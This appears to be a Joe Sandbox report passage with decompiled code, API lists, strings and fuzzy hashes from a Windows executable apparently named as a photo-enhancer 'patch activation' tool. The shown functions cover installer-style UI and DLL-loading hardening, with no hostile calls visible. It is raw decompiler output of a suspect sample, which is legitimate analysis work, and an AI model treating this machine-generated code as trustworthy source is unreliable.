									E00414FA8( *((intOrPtr*)( *_t1487 + 0x210)), _t1487, _v24, _t1886, _t1914);
									if(( *0x49f31b & 0x00000004) == 0) {
										__eflags = 0;
										E00414ED4( *((intOrPtr*)( *_t1487 + 0x214)), _t1529, 0, _t1886);
									} else {
										if( *0x49f124 != 0 ||  *((char*)( *_t1487 + 0x320)) != 0) {
											E0042B574(1);
										}
										E00414ED4( *((intOrPtr*)( *_t1487 + 0x214)), _t1529, 1, _t1886);
									}
									_pop(_t1768);
									 *[fs:eax] = _t1768;
									_push(E0046A034);
									E00403400( &_v68);
									E00403400( &_v52);
									return E00403400( &_v24);
								}
							}
							_v48 = _t1239 + 1;
							_t1914 = 0;
							while(1) {
								_t1241 =  *0x49f374; // 0x2252ae8
								_v36 = E0040B6DC(_t1241, _t1914);
								if(( *(_v36 + 0x24) & 0x00000001) != 0) {
									break;
								}
								_t1914 =  &(_t1914->i);
								_t517 =  &_v48;
								 *_t517 = _v48 - 1;
								__eflags =  *_t517;
								if( *_t517 != 0) {
									continue;
								}
								goto L108;
							}
							E0042A4EC( *((intOrPtr*)( *_t1487 + 0x228)), _t1914);
							E0046AF6C( *_t1487, 1,  *_v36, _t1922);
							_t1529 = 0;
							_t1791 =  *0x49f134; // 0x22529a4
							E0046AE0C( *_t1487, _t1487, 0, _t1791, _t1886, _t1914);
						}
						goto L108;
					}
					_v48 = _t1147 + 1;
					_t1915 = 0;
					do {
						_t1253 =  *0x49f378; // 0x2252afc
						_t1886 = E0040B6DC(_t1253, _t1915);
						if(( *(_t1886 + 0x35) & 0x00000008) == 0) {
							 *(_t1886 + 0x35) & 0x00000001 =  *(_t1886 + 0x35) & 0x00000010;
							E0047E4A8( *((intOrPtr*)(_t1886 + 4)), _t1529,  &_v52);
							_t1529 = 0;
							__eflags = 0;
							E0044D178( *((intOrPtr*)( *_t1487 + 0x27c)), _v52, _t1886, ( *(_t1886 + 0x20) & 0xffffff00 | 0 != 0x00000000) ^ 0x00000001,  *(_t1886 + 0x20), ( *(_t1886 + 0x1c) & 0xffffff00 | 0 != 0x00000000) ^ 0x00000001, 0,  *(_t1886 + 0x1c));
						} else {
							E0047E4A8( *((intOrPtr*)(_t1886 + 4)), _t1529,  &_v52);
							_t1529 = 0;
							E0044D248(0, _v52, _t1886, ( *(_t1886 + 0x1c) & 0xffffff00 | ( *(_t1886 + 0x35) & 0x00000001) != 0x00000000) ^ 0x00000001, 0,  *(_t1886 + 0x1c));
						}
						if( *((intOrPtr*)(_t1886 + 0x3a)) != 0 ||  *((intOrPtr*)(_t1886 + 0x36)) >= 0x100000) {
							 *((char*)( *_t1487 + 0x340)) = 1;
						}
						_t1915 = _t1915 + 1;
						_t505 =  &_v48;
						 *_t505 = _v48 - 1;
					} while ( *_t505 != 0);
					goto L93;
				} else {
					E0042A468( *((intOrPtr*)( *_t1487 + 0x228)));
					_t1278 =  *0x49f374; // 0x2252ae8
					_t1280 =  *((intOrPtr*)(_t1278 + 8)) - 1;
					if(_t1280 < 0) {
						L74:
						if(_v28 != 0xffffffff ||  *((intOrPtr*)( *_t1487 + 0x310)) == 0) {
							L81:
							if(_v28 == 0xffffffff) {
								_t1758 = 0;
								__eflags = 0;
								E0042A4EC( *((intOrPtr*)( *_t1487 + 0x228)), 0);
							} else {
								_t1758 = _v28;
								E0042A4EC( *((intOrPtr*)( *_t1487 + 0x228)), _v28);
							}
							goto L84;
						} else {
							_t1288 =  *0x49f374; // 0x2252ae8
							_t1290 =  *((intOrPtr*)(_t1288 + 8)) - 1;
							if(_t1290 < 0) {
								goto L81;
							}
							_v48 = _t1290 + 1;
							_t1914 = 0;
							while(1) {
								_t1292 =  *0x49f374; // 0x2252ae8
								_v36 = E0040B6DC(_t1292, _t1914);
								if(E00406F54( *_v36,  *((intOrPtr*)( *_t1487 + 0x310))) == 0) {
									break;
								}
								_t1914 =  &(_t1914->i);
								_t459 =  &_v48;
								 *_t459 = _v48 - 1;
								__eflags =  *_t459;
								if( *_t459 != 0) {
									continue;
								}
								goto L81;
							}
							_v28 = _t1914;
							goto L81;
						}
					}
					_v48 = _t1280 + 1;
					_t1916 = 0;
					do {
						_t1299 =  *0x49f374; // 0x2252ae8
						_v36 = E0040B6DC(_t1299, _t1916);
						E0047E4A8( *((intOrPtr*)(_v36 + 4)), _t1529,  &_v52);
						_t1529 = _v36;
						_t1886 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x228)) + 0xfc))));
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x228)) + 0xfc)))) + 0x30))();
						if(_v28 == 0xffffffff &&  *0x49f130 != 0) {
							_t1802 =  *0x49f130; // 0x0
							if(E00406F54( *_v36, _t1802) == 0) {
								_v28 = _t1916;
								if(( *(_v36 + 0x24) & 0x00000001) == 0) {
									_v29 = 1;
								}
							}
						}
						_t1916 =  &(_t1916->i);
						_t449 =  &_v48;
						 *_t449 = _v48 - 1;
					} while ( *_t449 != 0);
					goto L74;
				}
			}

0x004688b8
0x004688b8
0x004688b8
0x004688b8
0x004688b8
0x004688b9
0x004688bb
0x004688be
0x004688bf
0x004688c0
0x004688c3
0x004688c6
0x004688c9
0x004688ce
0x004688d0
0x004688d3
0x004688d3
0x004688d8
0x004688db
0x004688de
0x004688e1
0x004688e6
0x004688e7
0x004688ec
0x004688ef
0x004688f9
0x0046890c
0x00468920
0x00468934
0x00468948
0x0046895c
0x00468970
0x00468976
0x0046897f
0x00468987
0x004689a1
0x004689a5
0x004689a9
0x004689bc
0x004689c9
0x004689cc
0x004689ce
0x004689d0
0x004689d0
0x004689dd
0x004689dd
0x004689e4
0x004689fe
0x00468a02
0x00468a0f
0x00468a19
0x00468a26
0x00468a29
0x00468a2b
0x00468a2d
0x00468a2d
0x00468a30
0x00468a3a
0x00468a3a
0x00468a02
0x00468a41
0x00468a46
0x00468a4d
0x00468a62
0x00468a4f
0x00468a51
0x00468a59
0x00468a59
0x00468a76
0x00468a7c
0x00468a82
0x00468a92
0x00468a98
0x00468aa8
0x00468aae
0x00468aba
0x00468acb
0x00468ad2
0x00468af0
0x00468af3
0x00468afb
0x00468b05
0x00468ad4
0x00468ad4
0x00468ad7
0x00468adf
0x00468ae9
0x00468ae9
0x00468abc
0x00468abc
0x00468ac4
0x00468ac4
0x00468b11
0x00468b1a
0x00468b24
0x00468b2f
0x00468b37
0x00468b40
0x00468b4a
0x00468b54
0x00468b54
0x00468b59
0x00468b5d
0x00468b61
0x00468b65
0x00468b69
0x00468b7c
0x00468b8a
0x00468b97
0x00468ba6
0x00468bb5
0x00468bbc
0x00468bd2
0x00468be6
0x00468beb
0x00468bf7
0x00468c0a
0x00468c0f
0x00468c18
0x00468c27
0x00468c3e
0x00468c4b
0x00468c5a
0x00468c69
0x00468c80
0x00468c93
0x00468c98
0x00468ca1
0x00468cb8
0x00468cc2
0x00468ccd
0x00468cd6
0x00468cdb
0x00468cdc
0x00468cee
0x00468d00
0x00468d06
0x00468d21
0x00468d2b
0x00468d38
0x00468d48
0x00468d57
0x00468d77
0x00468d81
0x00468d8e
0x00468d96
0x00468d9c
0x00468dac
0x00468dba
0x00468dc0
0x00468dd5
0x00468ddf
0x00468def
0x00468e11
0x00468e1e
0x00468e24
0x00468e31
0x00468e37
0x00468e45
0x00468e4b
0x00468e60
0x00468e6d
0x00468e73
0x00468e80
0x00468e86
0x00468ea9
0x00468ecc
0x00468eda
0x00468ee0
0x00468ef5
0x00468f02
0x00468f08
0x00468f2a
0x00468f38
0x00468f3e
0x00468f46
0x00468f53
0x00468f60
0x00468f66
0x00468f7a
0x00468f89
0x00468f9b
0x00468fa8
0x00468fae
0x00468fc2
0x00468fd1
0x00468fd6
0x00468fdd
0x00469043
0x00469050
0x00469052
0x00468fdf
0x00468ff4
0x00469001
0x00469007
0x00469032
0x00469032
0x00469060
0x0046906b
0x00469083
0x0046908d
0x0046909d
0x004690a9
0x004690b2
0x004690be
0x004690c2
0x004690d7
0x004690de
0x004690e0
0x004690ed
0x00469108
0x00469121
0x00469123
0x00469125
0x00469127
0x00469127
0x00469132
0x0046913d
0x0046913d
0x00469147
0x00469157
0x00469179
0x00469181
0x00469196
0x004691be
0x004691e9
0x004691f6
0x004691fb
0x00469208
0x0046920e
0x00469213
0x0046921e
0x00469223
0x00469256
0x00469285
0x0046928f
0x0046929f
0x004692bc
0x004692ca
0x004692d5
0x004692ed
0x004692f7
0x00469307
0x0046931b
0x00469332
0x0046933f
0x00469343
0x0046934d
0x0046935d
0x0046936c
0x00469378
0x0046937a
0x00469383
0x0046938f
0x004693a7
0x004693b4
0x004693b4
0x00469383
0x004693c2
0x004693cd
0x004693e5
0x004693ef
0x004693ff
0x0046940b
0x00469428
0x0046942c
0x00469448
0x0046944a
0x00469457
0x00469472
0x0046948b
0x0046948d
0x0046948f
0x00469491
0x00469491
0x0046949c
0x004694a7
0x004694a7
0x004694b1
0x004694c1
0x004694eb
0x004694f3
0x00469510
0x00469538
0x00469563
0x00469570
0x00469576
0x0046957b
0x00469586
0x0046958b
0x004695be
0x004695ed
0x004695fa
0x00469600
0x0046960e
0x00469619
0x00469631
0x0046963b
0x0046964b
0x0046966d
0x0046967c
0x00469695
0x004696ad
0x004696bb
0x004696c6
0x004696de
0x004696ec
0x004696f7
0x0046970f
0x0046971d
0x00469728
0x00469740
0x0046974e
0x00469754
0x00469769
0x00469776
0x0046977c
0x00469790
0x0046979e
0x004697b8
0x004697cc
0x004697d2
0x004697d8
0x004697e8
0x004697ee
0x004697f8
0x00469800
0x00469806
0x00469807
0x00469817
0x00469826
0x00469849
0x00469856
0x0046985c
0x00469869
0x0046986f
0x00469888
0x00469895
0x004698d9
0x004698db
0x00469897
0x0046989f
0x004698a7
0x004698ad
0x004698ba
0x004698ca
0x004698ca
0x004698e7
0x004698f3
0x00469906
0x00469906
0x00469912
0x0046991e
0x00469931
0x00469931
0x0046993d
0x00469949
0x0046995c
0x0046995c
0x00469970
0x0046997c
0x00469981
0x00469994
0x0046999b
0x004699a7
0x004699c1
0x004699bd
0x004699bd
0x004699bd
0x004699c5
0x004699d2
0x004699ec
0x004699e8
0x004699e8
0x004699e8
0x004699f0
0x004699f6
0x004699fd
0x00469a08
0x00469a17
0x00469a82
0x00469a97
0x00469aac
0x00469a19
0x00469a1c
0x00469a21
0x00469a31
0x00469a39
0x00469a3e
0x00469a4e
0x00469a56
0x00469a5b
0x00469a6b
0x00469a6b
0x00469a17
0x00469ab8
0x00469b53
0x00469b59
0x00469abe
0x00469ac1
0x00469ac6
0x00469ad5
0x00469ada
0x00469ae1
0x00469afd
0x00469b02
0x00469b06
0x00469b13
0x00469b13
0x00469ae3
0x00469ae6
0x00469aeb
0x00469aeb
0x00469b1e
0x00469b29
0x00469b34
0x00469b41
0x00469b44
0x00469b44
0x00469b5e
0x00469b67
0x00469c77
0x00469c7f
0x00469c96
0x00469c9b
0x00469ca3
0x00469ca6
0x00469d54
0x00469d58
0x00469dd7
0x00469ddb
0x00469e44
0x00469e49
0x00469e4d
0x00469e51
0x00469e5b
0x00469e63
0x00469e63
0x00469e67
0x00469e67
0x00469ddd
0x00469de0
0x00469dea
0x00469ded
0x00469df0
0x00469df4
0x00469e39
0x00469e3d
0x00469df6
0x00469df8
0x00469e08
0x00469e16
0x00469e1d
0x00469e2d
0x00469e2d
0x00469df4
0x00469d6c
0x00469d6c
0x00469d74
0x00469d77
0x00469e6c
0x00469e6e
0x00469e75
0x00469e81
0x00469edb
0x00469edd
0x00469e83
0x00469e8b
0x00469e92
0x00469e9c
0x00469ea6
0x00469ebb
0x00469ec2
0x00469ecc
0x00469ecc
0x00469ea6
0x00469ef5
0x00469f01
0x00469f12
0x00469f18
0x00469f22
0x00469f26
0x00469f26
0x00469f2e
0x00469f33
0x00469f42
0x00469f4e
0x00469f6a
0x00469f6c
0x00469f73
0x00469f89
0x00469f94
0x00000000
0x00469f94
0x00469f82
0x00469f87
0x00469fa6
0x00000000
0x00469fa6
0x00000000
0x00469f5b
0x00469f5e
0x00469f63
0x00469fab
0x00469fb6
0x00469fc2
0x0046a000
0x0046a002
0x00469fc4
0x00469fcb
0x00469fe2
0x00469fe2
0x00469ff1
0x00469ff1
0x0046a009
0x0046a00c
0x0046a00f
0x0046a017
0x0046a01f
0x0046a02c
0x0046a02c
0x00469f4e
0x00469d7e
0x00469d81
0x00469d83
0x00469d85
0x00469d8f
0x00469d99
0x00000000
0x00000000
0x00469dcc
0x00469dcd
0x00469dcd
0x00469dcd
0x00469dd0
0x00000000
0x00000000
0x00000000
0x00469dd2
0x00469da5
0x00469db3
0x00469db8
0x00469dba
0x00469dc2
0x00469dc2
0x00000000
0x00469d58
0x00469cad
0x00469cb0
0x00469cb2
0x00469cb4
0x00469cbe
0x00469cc4
0x00469d0a
0x00469d1b
0x00469d2b
0x00469d2b
0x00469d2d
0x00469cc6
0x00469cdd
0x00469ced
0x00469cef
0x00469cef
0x00469d36
0x00469d43
0x00469d43
0x00469d4a
0x00469d4b
0x00469d4b
0x00469d4b
0x00000000
0x00469b6d
0x00469b75
0x00469b7a
0x00469b82
0x00469b85
0x00469bfc
0x00469c00
0x00469c50
0x00469c54
0x00469c70
0x00469c70
0x00469c72
0x00469c56
0x00469c5e
0x00469c61
0x00469c61
0x00000000
0x00469c0d
0x00469c0d
0x00469c15
0x00469c18
0x00000000
0x00000000
0x00469c1b
0x00469c1e
0x00469c20
0x00469c22
0x00469c2c
0x00469c43
0x00000000
0x00000000
0x00469c4a
0x00469c4b
0x00469c4b
0x00469c4b
0x00469c4e
0x00000000
0x00000000
0x00000000
0x00469c4e
0x00469c45
0x00000000
0x00469c45
0x00469c00
0x00469b88
0x00469b8b
0x00469b8d
0x00469b8f
0x00469b99
0x00469ba5
0x00469bbb
0x00469bbe
0x00469bc0
0x00469bc7
0x00469bd7
0x00469be4
0x00469be6
0x00469bf0
0x00469bf2
0x00469bf2
0x00469bf0
0x00469be4
0x00469bf6
0x00469bf7
0x00469bf7
0x00469bf7
0x00000000
0x00469b8d

APIs

Part of subcall function 004988F0: MulDiv.KERNEL32(?,?,00000006), ref: 00498967
Part of subcall function 004988F0: MulDiv.KERNEL32(?,?,0000000D), ref: 0049897C

Part of subcall function 00498738: GetWindowRect.USER32 ref: 0049874E

LoadBitmapA.USER32 ref: 00468CC8

Part of subcall function 004989BC: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 004989C6

Part of subcall function 0042F1C8: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042F224
Part of subcall function 0042F1C8: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042F241

Part of subcall function 00498688: GetDC.USER32(00000000), ref: 004986AA
Part of subcall function 00498688: SelectObject.GDI32(?,00000000), ref: 004986D0
Part of subcall function 00498688: ReleaseDC.USER32 ref: 00498721

Part of subcall function 004989AC: MulDiv.KERNEL32(0000004B,?,00000006), ref: 004989B6

GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0230CAA4,0230E874,?,?,0230E8A4,?,?,0230E8F4,?), ref: 0046996B
AppendMenuA.USER32 ref: 0046997C
AppendMenuA.USER32 ref: 00469994

Strings

(Default), xrefs: 00469F7D
, xrefs: 00468D89
STOPIMAGE, xrefs: 00468CBD

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Menu$Append$AddressAutoBitmapCompleteLoadObjectProcRectReleaseSelectSystemWindow
String ID: $(Default)$STOPIMAGE
API String ID: 2472569012-770201673
Opcode ID: 8946f81524f9d19275f7abce38fb92794786ad1c9579238aa5d491563488633e
Instruction ID: f09852cb7729e2bbd5cbdd1f7d0006831e648923f53a2056fc505b03d658ebd5
Opcode Fuzzy Hash: 8946f81524f9d19275f7abce38fb92794786ad1c9579238aa5d491563488633e
Instruction Fuzzy Hash: E5F2C7386005148FCB00EB69D8D9F9977F5BF89304F1542BAE5049B36AD778AC4ACB4A

Uniqueness

Uniqueness Score: -1.00%

Function 004089F8 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004089F8(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100); // executed
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00403494(_t10, _t18);
				}
				return E004034E0(_t10, _t5 - 1,  &_v260, _t19);
			}

0x00408a03
0x00408a05
0x00408a16
0x00408a1b
0x00408a1d
0x00000000
0x00408a35
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049E4C4,00000001,?,00408AC3,?,00000000,00408BA2), ref: 00408A16

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6517a6df1027816fea4addc753f432335232e8d46b8be6dc802d5a2abbf08fa6
Instruction ID: 256e1aeba2a9af0ec73989512e647111dc5dc60b4a8a7c740aeb84942aea65fa
Opcode Fuzzy Hash: 6517a6df1027816fea4addc753f432335232e8d46b8be6dc802d5a2abbf08fa6
Instruction Fuzzy Hash: 61E0683170021457C311A91A8C82AFBB34CDB18354F40427FBD44E73C2EDB89E4146EC

Uniqueness

Uniqueness Score: -1.00%

Function 00424014 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00424014(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x20));
				_push(_t26); // executed
				L00405E1C(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}

0x00424020
0x0042402a
0x00424033
0x0042403a
0x0042403d
0x0042403e
0x00424049
0x0042404d

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,?,004245E1,?,00000000,004245EC), ref: 0042403E

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 3c6509642d3bb9f27e5e83e23d7c94f2c76b3e04732c449b11ab7c6176b5423f
Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
Opcode Fuzzy Hash: 3c6509642d3bb9f27e5e83e23d7c94f2c76b3e04732c449b11ab7c6176b5423f
Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94

Uniqueness

Uniqueness Score: -1.00%

Function 004063FC Relevance: 43.9, APIs: 7, Strings: 18, Instructions: 182
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004063FC(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi) {
				char _v8;
				long _t48;
				_Unknown_base(*)()* _t51;
				_Unknown_base(*)()* _t52;
				_Unknown_base(*)()* _t58;
				intOrPtr _t63;
				void* _t64;
				signed int _t147;
				signed int _t149;
				intOrPtr _t156;
				intOrPtr _t158;
				intOrPtr _t159;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t181;
				intOrPtr _t183;
				struct HINSTANCE__* _t187;
				intOrPtr _t191;

				_t188 = __esi;
				_push(0);
				_push(__esi);
				_push(_t191);
				_push(0x4066b9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				_t187 = GetModuleHandleA("kernel32.dll");
				_t48 = GetVersion();
				_t149 = 0;
				if(_t48 != 0x600) {
					_t188 = GetProcAddress(_t187, "SetDefaultDllDirectories");
					if(_t188 != 0) {
						_t147 =  *_t188(0x800);
						asm("sbb ebx, ebx");
						_t149 =  ~( ~_t147);
					}
				}
				if(_t149 == 0) {
					_t58 = GetProcAddress(_t187, "SetDllDirectoryW");
					if(_t58 != 0) {
						 *_t58(0x406708);
					}
					E00406348( &_v8);
					E00403450(0x49e498, _t149, _v8, _t187, _t188);
					if( *0x49e498 != 0) {
						_t63 =  *0x49e498; // 0x0
						_t64 = E00403574(_t63);
						_t158 =  *0x49e498; // 0x0
						if( *((char*)(_t158 + _t64 - 1)) != 0x5c) {
							E0040357C(0x49e498, 0x406714);
						}
						_t159 =  *0x49e498; // 0x0
						E00403494( &_v8, _t159);
						E0040357C( &_v8, "uxtheme.dll");
						E00406374(_v8, _t149);
						_t161 =  *0x49e498; // 0x0
						E00403494( &_v8, _t161);
						E0040357C( &_v8, "userenv.dll");
						E00406374(_v8, _t149);
						_t163 =  *0x49e498; // 0x0
						E00403494( &_v8, _t163);
						E0040357C( &_v8, "setupapi.dll");
						E00406374(_v8, _t149);
						_t165 =  *0x49e498; // 0x0
						E00403494( &_v8, _t165);
						E0040357C( &_v8, "apphelp.dll");
						E00406374(_v8, _t149);
						_t167 =  *0x49e498; // 0x0
						E00403494( &_v8, _t167);
						E0040357C( &_v8, "propsys.dll");
						E00406374(_v8, _t149);
						_t169 =  *0x49e498; // 0x0
						E00403494( &_v8, _t169);
						E0040357C( &_v8, "dwmapi.dll");
						E00406374(_v8, _t149);
						_t171 =  *0x49e498; // 0x0
						E00403494( &_v8, _t171);
						E0040357C( &_v8, "cryptbase.dll");
						E00406374(_v8, _t149);
						_t173 =  *0x49e498; // 0x0
						E00403494( &_v8, _t173);
						E0040357C( &_v8, "oleacc.dll");
						E00406374(_v8, _t149);
						_t175 =  *0x49e498; // 0x0
						E00403494( &_v8, _t175);
						E0040357C( &_v8, "version.dll");
						E00406374(_v8, _t149);
						_t177 =  *0x49e498; // 0x0
						E00403494( &_v8, _t177);
						E0040357C( &_v8, "profapi.dll");
						E00406374(_v8, _t149);
						_t179 =  *0x49e498; // 0x0
						E00403494( &_v8, _t179);
						E0040357C( &_v8, "comres.dll");
						E00406374(_v8, _t149);
						_t181 =  *0x49e498; // 0x0
						E00403494( &_v8, _t181);
						E0040357C( &_v8, "clbcatq.dll");
						E00406374(_v8, _t149);
						_t183 =  *0x49e498; // 0x0
						E00403494( &_v8, _t183);
						E0040357C( &_v8, "ntmarta.dll");
						E00406374(_v8, _t149);
					}
				}
				_t51 = GetProcAddress(_t187, "SetSearchPathMode");
				if(_t51 != 0) {
					 *_t51(0x8001);
				}
				_t52 = GetProcAddress(_t187, "SetProcessDEPPolicy");
				if(_t52 != 0) {
					 *_t52(1); // executed
				}
				_pop(_t156);
				 *[fs:eax] = _t156;
				_push(E004066C0);
				return E00403400( &_v8);
			}

0x004063fc
0x004063ff
0x00406402
0x00406406
0x00406407
0x0040640c
0x0040640f
0x0040641c
0x0040641e
0x00406425
0x0040642b
0x00406438
0x0040643c
0x00406443
0x00406449
0x0040644b
0x0040644b
0x0040643c
0x0040644f
0x0040645b
0x00406462
0x00406469
0x00406469
0x0040646e
0x0040647b
0x00406487
0x0040648d
0x00406492
0x00406497
0x004064a2
0x004064ae
0x004064ae
0x004064b3
0x004064bc
0x004064c9
0x004064d1
0x004064d6
0x004064df
0x004064ec
0x004064f4
0x004064f9
0x00406502
0x0040650f
0x00406517
0x0040651c
0x00406525
0x00406532
0x0040653a
0x0040653f
0x00406548
0x00406555
0x0040655d
0x00406562
0x0040656b
0x00406578
0x00406580
0x00406585
0x0040658e
0x0040659b
0x004065a3
0x004065a8
0x004065b1
0x004065be
0x004065c6
0x004065cb
0x004065d4
0x004065e1
0x004065e9
0x004065ee
0x004065f7
0x00406604
0x0040660c
0x00406611
0x0040661a
0x00406627
0x0040662f
0x00406634
0x0040663d
0x0040664a
0x00406652
0x00406657
0x00406660
0x0040666d
0x00406675
0x00406675
0x00406487
0x00406680
0x00406687
0x0040668e
0x0040668e
0x00406696
0x0040669d
0x004066a1
0x004066a1
0x004066a5
0x004066a8
0x004066ab
0x004066b8

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,004066B9,?,?,?,?,00000000,?,0049BA44), ref: 00406417
GetVersion.KERNEL32(kernel32.dll,00000000,004066B9,?,?,?,?,00000000,?,0049BA44), ref: 0040641E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00406433
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040645B
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406680
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406696
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,kernel32.dll,00000000,004066B9,?,?,?,?,00000000,?,0049BA44), ref: 004066A1

Strings

ntmarta.dll, xrefs: 00406668
profapi.dll, xrefs: 004065FF
propsys.dll, xrefs: 00406550
kernel32.dll, xrefs: 00406412
version.dll, xrefs: 004065DC
SetProcessDEPPolicy, xrefs: 00406690
SetSearchPathMode, xrefs: 0040667A
SetDllDirectoryW, xrefs: 00406455
userenv.dll, xrefs: 004064E7
cryptbase.dll, xrefs: 00406596
oleacc.dll, xrefs: 004065B9
clbcatq.dll, xrefs: 00406645
SetDefaultDllDirectories, xrefs: 0040642D
apphelp.dll, xrefs: 0040652D
dwmapi.dll, xrefs: 00406573
uxtheme.dll, xrefs: 004064C4
comres.dll, xrefs: 00406622
setupapi.dll, xrefs: 0040650A

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$HandleModulePolicyProcessVersion
String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
API String ID: 3297890031-1119018034
Opcode ID: aa2224054af9e2cdb85ff1d97acc07dc748637bf55eb8aa36b25b3eca2d85656
Instruction ID: 7e21cf5f117f2e3abcec30b6674fd8076a5a40f26409e7412662737288cf0c05
Opcode Fuzzy Hash: aa2224054af9e2cdb85ff1d97acc07dc748637bf55eb8aa36b25b3eca2d85656
Instruction Fuzzy Hash: 5C612030A00009EBDB01FBAAD982D8D7BB89B45749B214077A405772F6DB3CEF199B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00485E3C Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 72
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

